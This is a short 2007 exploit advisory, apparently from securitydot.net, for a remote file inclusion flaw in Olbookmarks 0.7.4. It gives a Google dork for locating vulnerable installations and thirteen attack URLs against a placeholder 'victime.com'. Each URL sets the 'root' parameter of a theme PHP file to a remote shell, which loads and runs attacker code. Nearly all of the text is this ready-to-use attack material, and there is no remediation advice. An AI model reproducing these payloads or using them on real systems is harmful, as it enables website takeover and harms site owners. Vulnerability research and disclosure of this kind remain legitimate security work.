Rated as : Moderate Risk
#Olbookmarks =>0.7.4 multiple RFI (root)
Download script :
#D0rk : allintitle:ol'bookmarks
#Thanks Str0ke
#Exploit :
http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz
#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell
#http://victime.com/path/themes/blackorange.php?root=shell
#http://victime.com/path/theme/default.php?root=shell
#http://victime.com/path/theme/frames1.php?root=shell
#http://victime.com/path/theme/frames1_top.php?root=shell
#http://victime.com/path/theme/test1.php?root=shell
#http://victime.com/path/theme/test2.php?root=shell
#http://victime.com/path/theme/test3.php?root=shell
#http://victime.com/path/theme/test4.php?root=shell
#http://victime.com/path/theme/test5.php?root=shell
#http://victime.com/path/theme/test6.php?root=shell
#http://victime.com/path/theme/frames1_left.php?root=shell
#http://victime.com/path/theme/frames1_center.php?root=shell
#Discovered by ThE TiGeR
#Miro_Tiger[at]Hotmail[dot]com
securitydot.net - 2007-05-22
|
